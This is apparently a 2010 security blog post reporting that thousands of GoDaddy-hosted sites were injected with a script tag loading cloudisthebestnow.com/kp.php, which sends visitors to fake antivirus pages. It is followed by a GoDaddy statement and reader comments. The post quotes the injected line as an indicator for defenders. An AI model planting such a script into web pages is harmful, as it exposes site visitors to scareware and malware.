GoDaddy sites hacked with cloudisthebestnow

If you thought your problems at GoDaddy were over, well, not yet.

We’ve confirmed that today at around 3pm EST, GoDaddy servers were hacked again. Malware pointing to cloudisthebestnow.com/kp.php was inserted on thousands of sites hosted by the provider.

This is how the script will look like in your pages:

< script src = http://cloudisthebestnow.com/kp.php >

It will redirect your users to that nasty “fake AV” page again. What’s interesting is that cloudisthebestnow.com is hosted and owned by the same people involved in the latest attacks at GoDaddy.

$ host cloudisthebestnow.com
cloudisthebestnow.com has address 193.104.34.55
$ host losotrana.com
losotrana.com has address 193.104.34.55

A sample of the malware injected in the pages is available here: http://sucuri.net/malware/entry/MW:MROBH:2

If you are one of our customers, our scanner probably alerted you or will do so very soon.

How is this happening?

GoDaddy has some internal vulnerability that is allowing the attackers to upload the following code to their sites: MW:SIPRO:1. A few minutes after this code is uploaded, the attackers run it remotely and this PHP script infects all the files within the site.

Clean up:

Our clean up script still works: Simple Cleanup Solution

Update from GoDaddy:

GoDaddy contacted us and left the following comment:

After the most recent malware attack the Go Daddy Security Operations Team conducted a thorough investigation and removed the malicious code impacting our customers.

The attack injects websites with a fake-antivirus pop-up ad, claiming the visitor’s computer is infected.

If you believe your website is impacted, please fill out our Security Form, located here: https://www.godaddy.com/community/contactus.aspx?…

Our analysts will review and, if needed, remove the offending material from your website.

Neil Warner, Go Daddy Chief Information Officer

If you are having difficulties getting your site cleanup, send us an email at support@sucuri.net, or visit our site: sucuri.net. We can get your sites cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • http://twitter.com/Bourgy @Bourgy

    Just when I thought they'd solve it.
    I guess my site's turn will soon be coming
    My recent post Tila Tequila Attacked By 2nd Personality

  • Pingback: Tweets that mention GoDaddy sites hacked with cloudisthebestnow | Sucuri Security -- Topsy.com()

  • JohnR

    Yep, they got me again too at GoDaddy… Enormously frustrating. The attacks have continued now about once every 2.5 weeks for the past two months and everything I've done in recent months to try to protect and harden my sites was worthless, as the hackers seem to be getting in somehow via a backdoor out of my control and GD is unable to stop it. My actions here appear to be entirely irrelevant at this point, and their communication is among the worst ever I've seen from a company.

    They can't seem to stop it and I don't know if it's ignorance or ineptitude, but it doesn't matter anymore… A house is no good if the doors won't lock and soon I am going to be long gone from this broken house.

  • http://www.mirsolutions.net MirSolutions

    I did not see any of my sites infected as of 06/09/10, maybe because I have all my hosting on windows server using asp or asp.net no serious php.

    I hope it contained completely soon.

  • Neil Warner

    Update: 6/9/2010

    After the most recent malware attack (more details here: http://community.godaddy.com/godaddy/malware-upda… the Go Daddy Security Operations Team conducted a thorough investigation and removed the malicious code impacting our customers.

    The attack injects websites with a fake-antivirus pop-up ad, claiming the visitor’s computer is infected.

    If you believe your website is impacted, please fill out our Security Form, located here: https://www.godaddy.com/community/contactus.aspx?…

    Our analysts will review and, if needed, remove the offending material from your website.

    Neil Warner, Go Daddy Chief Information Officer

    • JohnR

      How about stopping it from happening Neil?

  • http://twitter.com/elizawhat @elizawhat

    I’m not impressed with GoDaddy’s response to this. The information on their site about the attack is skimpy, whereas this site has more information about how to tell whether your site has been compromised. Once again, I’m very glad I use Host Gator. Unfortunately, many of my clients use GoDaddy. I’m hoping none of their sites have been compromised. I’ve never had a problem with security with Host Gator.
    My recent post Office supply high

  • http://breadboxes.org Jay

    Ouch, yet another one… Godaddy has had so many vulnerabilities lately.
    My recent post A Review Of Another Bread Lover’s Necessity – Bread Machines

  • Pingback: I siti WordPress ospitati da GoDaddy attaccati nuovamente()

  • Pingback: WordPress-based, GoDaddy-hosted websites hacked()

  • cassadnra

    My ecommerce site's shopping cart with php was hacked through GoDaddy and they are blaming me for the second time. It is not on my end and I can fix it with my backup files. I emailed them a copy of the letter from Neil asking why they didnt' send me that message instead of blaming my software and my computer. We'll see what happens.

  • Greg

    just got hacked again on GoDaddy 4th time on the same site, this was a fresh install, the problem is on their servers not the sites.
    PHP might have a bit to answer for too, it can only attack via PHP, all static HTML is fine.
    I think there is a hint in the name of the domain "cloud is best now".
    Ruby on Rails here I come ( on Heroku, Engine yard or many other rising stars that have the know how, to have a fighting chance at secure sites).